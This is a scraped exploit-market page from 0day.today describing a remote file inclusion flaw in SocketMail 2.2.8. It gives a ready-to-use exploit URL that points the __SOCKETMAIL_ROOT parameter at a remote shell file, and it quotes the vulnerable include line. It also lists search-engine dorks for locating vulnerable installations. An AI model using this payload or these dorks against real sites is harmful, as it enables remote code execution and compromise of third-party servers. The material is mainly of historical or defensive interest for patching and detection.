[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability

Author
BiNgZa
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2239
Category
web applications
Date add
21-10-2007
Platform
unsorted
======================================================================
SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability
======================================================================



Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:

----------------------------------------------
} else {
    include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm, str0ke

BiG sHoUt OuT tO udplink.net

FoUnD By BiNgZa

DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"

DORK2: "Powered by SocketMail"



#  0day.today [2024-09-20]  #